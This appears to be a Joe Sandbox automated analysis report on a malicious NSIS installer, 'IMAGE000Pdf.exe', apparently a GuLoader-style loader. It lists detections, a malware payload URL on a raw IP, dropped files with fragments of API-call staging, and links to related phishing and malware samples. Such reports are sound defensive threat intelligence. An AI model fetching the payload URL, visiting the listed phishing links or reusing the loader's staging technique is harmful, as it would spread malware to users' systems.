Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	22 System Information Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IMAGE000Pdf.exe	13%	ReversingLabs	Win32.Trojan.NsisInject
IMAGE000Pdf.exe	100%	Avira	HEUR/AGEN.1333748

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://173.249.193.48/VdpAwrpsFeHTHv196.binH	0%	Avira URL Cloud	safe
http://173.249.193.48/VdpAwrpsFeHTHv196.bind	0%	Avira URL Cloud	safe
http://173.249.193.48/VdpAwrpsFeHTHv196.bin5	0%	Avira URL Cloud	safe
http://173.249.193.48/VdpAwrpsFeHTHv196.binF	0%	Avira URL Cloud	safe
http://173.249.193.48/VdpAwrpsFeHTHv196.bin	100%	Avira URL Cloud	malware
http://173.249.193.48/VdpAwrpsFeHTHv196.bin:	0%	Avira URL Cloud	safe
http://173.249.193.48/VdpAwrpsFeHTHv196.bink	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.fb-t-msedge.net	13.107.253.45	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://173.249.193.48/VdpAwrpsFeHTHv196.bin	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	IMAGE000Pdf.exe, 00000003.00000001.1803045320.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	false		high
http://173.249.193.48/VdpAwrpsFeHTHv196.bin:	IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ftp.ftp://ftp.gopher.	IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp	false		high
http://173.249.193.48/VdpAwrpsFeHTHv196.binH	IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://173.249.193.48/VdpAwrpsFeHTHv196.bin5	IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	IMAGE000Pdf.exe, 00000003.00000001.1803045320.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	false		high
http://173.249.193.48/VdpAwrpsFeHTHv196.binF	IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	IMAGE000Pdf.exe	false		high
http://173.249.193.48/VdpAwrpsFeHTHv196.bind	IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://173.249.193.48/VdpAwrpsFeHTHv196.bink	IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
173.249.193.48	unknown	United States		11878	TZULOUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1548539
Start date and time:	2024-11-04 16:15:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IMAGE000Pdf.exe
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@3/11@0/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: IMAGE000Pdf.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
173.249.193.48	stormskridtets.exe	Get hash	malicious	FormBook, GuLoader	Browse	173.249.193.48/dlDSZQaZvoFz216.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.fb-t-msedge.net	https://email.abprotector.com/c/eJwUzU2OrCAQAODTwE4DBc3PgsXbeA1TUuWTDDadBsfJnH7SB_jyUbIRYDeSk_ZGuQA6RHkkAJfRs995x93paDmToYhsSONmUJbkPARNlh5b9LiCecRgLQQvrAIm0OTdtG0WJ-uUnTYinBwhZ_ocIc4nliprOsZ4dWH-CVgELPd9z6_8v2Lv3OfcTgFL53y9mdbrt62v9h5YBSzlSfwzH-Os8p36WcbRbn5a9RBWtWvU1r4-XI5yci1PXgslbYwJwSvj5XeCvwAAAP__4WRNQg#ZWJhbGxvdHZvdGVAY28ubW9ubW91dGgubmoudXM=	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	https://principledx-doc.jimdosite.com/	Get hash	malicious	Unknown	Browse	13.107.253.45
	mesh.exe	Get hash	malicious	MeshAgent	Browse	13.107.253.45
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	13.107.253.45
	https://add-to.password.land/XNllJMExLQVFyaWl5RE1YdDdhREtzbDBIbUhKUWZTY2ZQVkZiR3Ywa2p5V3k2UkMrNWZ5UzVndXdpaEgvVnQ0QU8wOHpNN3hlNmFRc2EzWUo4ajB3eHp2WE0vVWpoanlDVHlVU05nYytLS0doVmZ4bzdSKzhTMFJLdUlMb1IvMXgrUmtkRzFHWWp3OGJub29qR0paOGovZzgwNjJwN1l0bVJNeS9lcktlUTVKcC9SUGF5N0ZsLS16Q2pVSTZxanFackJzbkFELS02ZFg0VzVRcHhlYVZJTGxKMjZLS2h3PT0=?cid=289916869	Get hash	malicious	HTMLPhisher, KnowBe4	Browse	13.107.253.45
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	13.107.253.45
	https://sites.google.com/view/wek-3/home	Get hash	malicious	Unknown	Browse	13.107.253.45
	Cxn80OsiM7.lnk	Get hash	malicious	Unknown	Browse	13.107.253.45
	FYI - Important.eml	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://u47945148.ct.sendgrid.net/ls/click?upn=u001.9dvlopked3ris1nGcg14tPoM2A6CMemwZTDaRJoJq4jd7aIhsCDiiF2Uij5IX7IoxVCNb-2FU4GsxYRODT1XUt1-2BXsg4u2g6Xv7shi2KwA-2FQ0VxkUU7juHjUqhbVn-2Fx-2FcAGopnnm1kau3tQQMpfw5xQFcDDVCozNu9Qyz7TzkumNBcbmYS-2Fu0kcIQspHiDUP2GhsTydKpS05-2BUeDpna42R9gt8HVX5idvNxxW0Rs3x6Ek-3DTwYh_LbbiPRomajq-2F7SGqyRvSw-2FNX0BITv-2BL6GwFnEIs1N9jaD15T-2Faxa1SVV9dIOP1zKaaT4o1-2FajqyF-2FaKEpXZx40vSHjXkiSxb5l95BlWPN55WYqUlP31dA8uqWHqgobqgROB6gzPV6zyssP1ziZmejtco0MbI5H9fZb88Hj6H0vbPNu4SR3uxkHx0yEGTp4o-2F-2FAizUgF470FdzITJvs3E6v4P2lmQzMW-2B8fGrGjzN2iBGSfUxjRv0UHBG7wd3HMu32F-2Bz5NKlNql3g-2F2UnDfMjIaFvxv19Ttsbh0Dsvb73IqidNRCVrkdO6w3jJ1PBiTPQWnFoyLlvb-2BM-2BpSkM-2F62MWH4w8G4ZApGK9YvJKaCr9Oe2D0qt94RV8Y0yQlnWPvRViSTFaEbOec2Jd2UBTQ-2BXTxj55rra0wiS7odecDuo3rkk8ZIfxhrhs1M7zqfwefLDZDZ8tDcTW-2F4Ps4ejTITe17wya4NiMnkyPr5mFpqfENoZ7QiMhoyVlzuI8muURtGjCfPZdNj4aSOzOitmsu4TQ-3D-3D	Get hash	malicious	Unknown	Browse	13.107.253.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TZULOUS	stormskridtets.exe	Get hash	malicious	FormBook, GuLoader	Browse	173.249.193.48
	Brneforsorgspdagogers.exe	Get hash	malicious	FormBook, GuLoader	Browse	173.249.193.66
	Brneforsorgspdagogers.exe	Get hash	malicious	FormBook, GuLoader	Browse	173.249.193.66
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	173.249.236.72
	byte.arm5.elf	Get hash	malicious	Okiru	Browse	173.249.236.51
	https://tcmedcenter-my.sharepoint.com/:f:/g/personal/jessica_larson_tcmedcenter_org/Ek1X93Tsfp5KoiWqKbJ_ocQBqlE2wGVJqWkJh4H7mn0vuw?e=Yni2o7	Get hash	malicious	Unknown	Browse	173.249.199.16
	D6wsFZIM58.elf	Get hash	malicious	Unknown	Browse	173.249.236.64
	https://netorgft4648155-my.sharepoint.com/:f:/g/personal/cgriffith_nationsbest_net/ErhP9j6s6O5LtAYvSf-k7fgBJJeB0TUcEyK1gf2JqcFeEw?e=iS1Nd2	Get hash	malicious	Unknown	Browse	173.249.199.16
	http://www.multichainbridges.com/	Get hash	malicious	Unknown	Browse	198.54.132.29

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dll	stormskridtets.exe	Get hash	malicious	FormBook, GuLoader	Browse
	orders_PI 008-01.exe	Get hash	malicious	Remcos, GuLoader	Browse
	RemotePCViewer.exe	Get hash	malicious	Unknown	Browse
	8737738_19082024.vbs	Get hash	malicious	FormBook, GuLoader	Browse
	8737738_19082024.vbs	Get hash	malicious	GuLoader	Browse
	Dhl Delivery(AWB 9849791014).exe	Get hash	malicious	GuLoader	Browse
	Dhl Delivery(AWB 9849791014).exe	Get hash	malicious	GuLoader	Browse
	89.hta	Get hash	malicious	Cobalt Strike, GuLoader	Browse
	sahost.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Program Files (x86)\Common Files\kvindagtigt.ini

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.0121618346445365
Encrypted:	false
SSDEEP:	3:BPi4YDgAmcAKDHMnhv:BPiBkAmc0nhv
MD5:	F298228D2D42CED0A00B0C5320000835
SHA1:	FB06F02DDCDA4C9EC752A688EE617064DB3A49EB
SHA-256:	E399AFE89F97EAE7BCDAE626913DA1618F4F42BA11887217CDBF524720532AB2
SHA-512:	464DA89F9E1D5935810443B20C3D19F77585D964DF89F5CB427482A03C8EF6274D06CBC01533D92C691FFD55E1725BA5F427D023A45A5128BCED0EEE11E083FE
Malicious:	false
Reputation:	low
Preview:	[skaaltalerens]..nonsaleability=sammenstuvningerne..

C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.737556724687435
Encrypted:	false
SSDEEP:	192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
MD5:	6E55A6E7C3FDBD244042EB15CB1EC739
SHA1:	070EA80E2192ABC42F358D47B276990B5FA285A9
SHA-256:	ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
SHA-512:	2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: stormskridtets.exe, Detection: malicious, Browse Filename: orders_PI 008-01.exe, Detection: malicious, Browse Filename: RemotePCViewer.exe, Detection: malicious, Browse Filename: 8737738_19082024.vbs, Detection: malicious, Browse Filename: 8737738_19082024.vbs, Detection: malicious, Browse Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious, Browse Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious, Browse Filename: 89.hta, Detection: malicious, Browse Filename: sahost.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms\leakers.txt

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	589
Entropy (8bit):	4.277818373535095
Encrypted:	false
SSDEEP:	12:mScXAtJsdW8lLQIVVCTP1t0laiam6mObo/Bpqwnh2yKbdB1j1f:mSrTsdRTVVM9Yz69Hwh2yKb7ff
MD5:	E80E34F461528DF8F86C4248C971B2AD
SHA1:	A1A74D8F5711DEED35AF2B81BE070CA471C39500
SHA-256:	F2552D843F4D62F481743A15B7C95AA322C14EA5DBB999C8C889A42CBB093A8E
SHA-512:	46A5D6487131677DAC16C2BE4FC29517C14CB8DB6228B40344D733597462122EF0D1D7DD69B4D5A7A10F9C86635F99D91E91AC2CEBDF923C6B72EF3809637622
Malicious:	false
Reputation:	low
Preview:	pervalvar udvalgsarbejderne illegitime besully.trvarefabrikkers stemmeslugers binomialfordelingernes metropolit.mariolatrous griffy fiskeeksporten valutapuklerne spekulanter infusioners quantifys unconsolidation digitalises forvaltningsret..steticismens advents syde rebaptization returneredes chemosterilants agtvrdige,balklines sludres drengestregers topful koordinatvrdien angorakats tendensromanens blockheadish lidelsesfller eskapismes amiably phenicious nontenurial..overspringe udmntede agnostiker polycarpic stolper lbskes forhandlingsomraader acquires duskly kildnes gaultherase..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms\persongalleriers.una

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	276701
Entropy (8bit):	1.2570216910370695
Encrypted:	false
SSDEEP:	768:yFPJSwGwS4JXi8PNDQNMDeMW3SGBqGHw1zwpmPMoaO64g1abi4IZxeMcdN9vfd95:/rFf4EoTti54LkFvI3oDW
MD5:	18C3DA2AA022FF0B89999E28E6A2AE9A
SHA1:	0659DDE0FD4B39B22825F1645A0BAE7E7202C7F9
SHA-256:	05DE1FF63CC38C7C4B3034091A311791BFF578658FF17D156AA4FB41A2E197C6
SHA-512:	D3A51D8B29FEF026F94B339087413319E03DA3193D9159A43AD7B4FEE35A67EEEBC3E66A0092B5ED14F57458173D518C618F2EE00F4203F428EBE0FC162F667C
Malicious:	false
Reputation:	low
Preview:	......................................................(.L.................................3........&.................."...........l........................s.....................................-...........................8..........@.........................................................h..................................@.........).........................I.................F..................................................................T..............................................................j..".......#I.............r.............&..................\|...............................................................................:.Z......................).............................................................................H.......C...........................................................................................t.........................................................M.............4........'........................................}..+.......................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms\porkiest.mis

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	313672
Entropy (8bit):	1.2567166720965932
Encrypted:	false
SSDEEP:	768:iEGLlMkjkYtwS3MeXM3OpckON5VIbjnI3Oif4NxZSqJbDvz+hE7IkHAYsaW3DQLF:LtWLdp3I3yrt+3SoTMU5oT5
MD5:	17B0342D31B6E728E13DF79009833371
SHA1:	B9F3354C4E886382D220D5EC4FA91F389585BD40
SHA-256:	8CAF84CE635BD92186709E81D12AE352E049C83B53F1C22A6DCB221E8F1C011E
SHA-512:	4772F5AE64E0619B23114A41785DDE7DD1A9BACE12A9ABEDEF3400EDB3660D4E780C9B91E23A9FDEC1D97BCF7DC48E201771D7D58EB1740191A05CCFDB433C83
Malicious:	false
Preview:	....................N............................k....................................................#.................................................................................`........0.............u...................................y................................................................g.........7................E.......&........w..............................................*....................<..................................3................i.......................................................................U...).................................................. ........................................................................................................................A..............................N......c.b.......................................................................................................N........T..............................................h..............................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Mutuary.civ

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	207881
Entropy (8bit):	7.331635651026833
Encrypted:	false
SSDEEP:	3072:zDyy/gxfmTCBeuVaCzUVI90J8g5sF6963goPdEWduKiKMLUW3tTS4NrQsgT99BwE:zDyR4WDsCgVImsE77KMLUS44NMx
MD5:	749F30B7C897431F55057BFE15DF7228
SHA1:	2DB933559839DD5F79454546C98CCE8E9C4C8112
SHA-256:	1506167C68DEBF892BD0E2EAD9515C1F3F80BCCA9C489E715F2436425B7D8D48
SHA-512:	8E6BC090DFE67D411EA2B386538BAF9ADE1C7A47031CD4BFA0E7D491CFEF814923E71BA1DF8A2CB0A41AFADAE896F77BD89170BB560112E2A2B7BAA8DCD60C9D
Malicious:	false
Preview:	............ ..............EEEEE...............n..............C....F.......mm...........D..............ttt...--........``..:::....S....rrrr............P.O..6....".GG...............#.0.....................E..............22...~~.......aa............,..................................&..gg........77..LLLLLL.......ii.......0..o.ff..}.x... .99.....RR...............~~~~~.....................J......................kkk........E..........C...ee.........................G............J.............YY..~...2.............l........##.........Z.........(...........h.y........000.......yy...........l..lll...........................88...@@@@@.QQ..........^^...........mm...................CCC........KKKK.........2...............++..........V......-................B.........w................ ..............!!!....MM......66................===....................NNN..........S....??.........k........D.................................(............................. .........////....x.ccc.ZZ.w..====......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\Cresouserte.Oml

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	16857
Entropy (8bit):	4.532822901243277
Encrypted:	false
SSDEEP:	384:+ipfHtyeVOvFfo92BAVO4tKq/vChYFVmuF1WbTeqFb7RfW:dlyttfo9iAVO4tiGmPZW
MD5:	143CC97C03735690BA675F029A4A3A16
SHA1:	7BBA23E28EDB92B05620AA4EA667D3C04DE93593
SHA-256:	EDCF653A613FF7FB1143DF97441A7027D486CA942A333F3EA0B74C7C11F3D88B
SHA-512:	01C2C26B31488E036F6C6634636B33A0C06672FF464549D12B653326FA1A90460FAF485C59D8F0B85C6CCF57946AC4D09A70B5A5D3609E93AD3DCDE421CF16A7
Malicious:	false
Preview:	.........UU..33........Z..nnnnnn....w.[..............EE................T.......................k..8e...r...n...e...l.N.3...2..M:...:.+.C...r..de...a...t...e...F.h.i...l...e...A...(...m... ...r...4... ...,... ...i... .&&0..cx...8...0...0...0...0...0...0...0...,..w ...i..w ...0...,... ...p... ...0...,... ...i... ...4...,... ...i... ..?0...x...8...0...,... .%%i... ...0...)...i.......r...8.......k...e...r...n...e...l._.3.~.2...:...:...S.**e...t..aF...i...l...e...P...o...i...n...t...e...r...(...i... ...r...8...,... ..vi... ...2...3...0...1...2... ...,... ...i... ./.0...,...i... ...0...)...i.......r...4.......k...e...r...n...e...l...3...2.s.:...:...V...i...r...t...u...a...l...A...l...l...o..Nc...(...i..y ...0...,...i... ...5...4..B0...6...7...2..N0...0...,... .ddi..G ...0...x...3...0...0...0...,... ..Bi... ...0...x..v4...0...)...p...../.r...2.......k...e...r.}.n...e...l..B3...2..U:...:...R.+.e...a...d...F...i...l...e...(...i... ...r...8...,... ...i... ...r...2...,... ...i... ..^5...4...0...6

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\Maleriet213.arc

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	244482
Entropy (8bit):	1.2509108197987615
Encrypted:	false
SSDEEP:	768:ArczTS8oocp0tWLSMkXWg7PKU30gfL4Qf1AUdyM03I3xkjFlu7NDSAZd+6XYIHXd:7Yhp0ckXv78owAC3MhxqI
MD5:	E6AC7A31DA2D4322339135AD20EB0F23
SHA1:	F76C6D6EE7C9B01DB799642990AA88B140003EC4
SHA-256:	00FAD7EC11DB9706955FDF3BE0E6FB037E9F9780F94A502A774B30AB52773A94
SHA-512:	C87DABB08D092D546FF80270B052CF1C5D92D25852DBFECC139CE528CCD2A22CCE130A8C90C08117DF542E6D83DE91E92180F853C201F042BED4681D4737E75D
Malicious:	false
Preview:	............................................w.........................................................................\.............................o.............q......................................]..........................I...............!...............................................m....... ............................................................................................h......K................=............................................................r..................................W....................................................................R......................................p..0...........................................................k.........k........................d........................................................................................................................9....................................#.....A........`...9...............P.......................................................................\...............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\afsgning.for

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	430713
Entropy (8bit):	1.2530301266200883
Encrypted:	false
SSDEEP:	1536:vu65sFtuGbUq4CCWG9TcLs9xEEc0MVWFnhMA:2PjbUquWUYs/9x
MD5:	8ED0D91C7C65B02A5630D1A012895C3D
SHA1:	FA74C3BD3A32123D71AEA67D386B5AC251FEC260
SHA-256:	1113E4990BEF55E4CD1D868513B2305C72803FB296D559BFA9C8C93DE2EDC8AB
SHA-512:	FBE41906CCABB44E8D71D7664B756F75ABDBF0FB80BFCBBF4BBA9D9370DF4CEDBE437BA9F116B3F9E9D2AE2FB1E2D34D34F152E518A2E5E0096A506093F8DB24
Malicious:	false
Preview:	..[.Z.....?............#......................................................0.....B..x....................................................Q.......Z......................I....j............{..........................................................................................................................................-.....7..............................M........9.U...........?...............................................................X..................../.....................t...............4................,........`........~..............d............................u............{.....................a.............................5.............{...g....Z.................H................l..........................S.............................................................................................................................J...........................................U............................x.....f.............D..../....o........................QLi...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\bookishly.egg

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	223405
Entropy (8bit):	1.2642457624863013
Encrypted:	false
SSDEEP:	768:DDh04DrooyUGbNSipoS0yYEt0ihBLBJU06zf8VWZt+il3sVxTD6I6o9+2u5inuB4:rorpFGQVWwj9bQdun2ljrAbUGl
MD5:	96E6C0CBBACF232110DF3E7FC4B4D980
SHA1:	FC18FDD4E5417AC76F68BF507AC0BA6B9A183CFE
SHA-256:	04F64748055424253509A229EE3E6F9BFC86898CBA667DA8312333552987B610
SHA-512:	8DD22ABBED1522A08E9AC3559F5CC6871B77C1B76C2A7AA0CD61E52CA7D3A43DCBAF00285BF29C1FF885FC5F424FA411F56F19EB1886DA97CC7010BCA66530A9
Malicious:	false
Preview:	....................................{............!.............Q.............................................................................:...........z..................................W.......................... ......................................3...........y...............j................!n...............................................................................3........................+.......................a.......................c........................................)............................................................................................................................?.............................................................................................S....../.....................................................6./...t..+.......................H............{..........&................................b............................R.......x....=..................V....]........>...................................m................0.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\etisk.hvs

Download File

Process:	C:\Users\user\Desktop\IMAGE000Pdf.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 175-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8.000000
Category:	dropped
Size (bytes):	385914
Entropy (8bit):	1.2561626561864936
Encrypted:	false
SSDEEP:	768:++TtgE2yMxqLKoiyt4CpVdIwu3Uema6LhlEv9cCAXP69rBqGDpx/NEJKTPLqqQJl:bMFgNCAE6oLJS9a/IrOyTWq2uC
MD5:	A4946227DE4DC2A79BF473A3D09C4247
SHA1:	9FF800E6B4A72B6281D812710D00AD003F757170
SHA-256:	1F6BB50C9AC95A61782FCDE006B6E396ACEDA7794FD30FFB7D97020FD7B8059E
SHA-512:	2902630584092375E1A2FB4669437C43548BC0D0E00B2B98A3FDAEEDC57F3567B61A3FC545C8157FD410D6E26C9A70E8D989E97983700FFB55D9D1154CEBE1F4
Malicious:	false
Preview:	..................................................#..................................._............................{.........................P................$.............................................................................................}............&................g.........................................A................................................K................................................Z..............-......5.........................................................e.......d..........................................L...............0......C................).................................................................................r............Q..2........................9................(...............................................t......................................................................>.....b..8.....................n.............]..................F.....................................U...................................S.........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.460432078632097
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IMAGE000Pdf.exe
File size:	915'632 bytes
MD5:	53441f2de2d573f3b2e4fb35c248229b
SHA1:	afc840f25adfcb5873f5b69e55b2920c370a2285
SHA256:	5bc4b28288f068f1c11e69b1cc94aacb4b0d2812494c1673471b890f1ce67a9e
SHA512:	021ba2fc3570b82daf0181f229e5e0b80a10f6a74a3f77baa4d608961c38222b03d428f82b7d5abfca6fa55cbfebc7b5e715f33ecf8f67882186b6601bfcbda2
SSDEEP:	12288:A3nIRS5/vuI8sOabBdHdWIXjwxipfpQGYAGau5yxX9O9u:A3IRgvuoO0pdZXjUiNuGYpawA9uu
TLSH:	59156949A38C50C6DD3A3B32FA1D7613B655AC138550118A3AC8BE583BF57B07B9FA31
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....

File Icon


Icon Hash:	d3672eac1a0c662c

Static PE Info

General

Entrypoint:	0x4034a2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	6e7f9a29f2c85394521a08b9f31f6275

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Underretternes, O=Underretternes, L=Lannemezan, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	25/01/2024 09:16:23 24/01/2027 09:16:23
Subject Chain	CN=Underretternes, O=Underretternes, L=Lannemezan, C=FR
Version:	3
Thumbprint MD5:	B7699D9FC11FF2BC8B537A1496DBA607
Thumbprint SHA-1:	13E2B15CFFB46BFE6E63F1DDDD5D08B90EC97D8B
Thumbprint SHA-256:	B488D28F491B0130739761D68A25298DFD95A7D90A466B370C1D833271156981
Serial:	0C38DED2C7C23BE59C80206BBCC81E7BF88A1876

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080CCh]
call dword ptr [004080D0h]
and eax, BFFFFFFFh
cmp ax, 00000006h
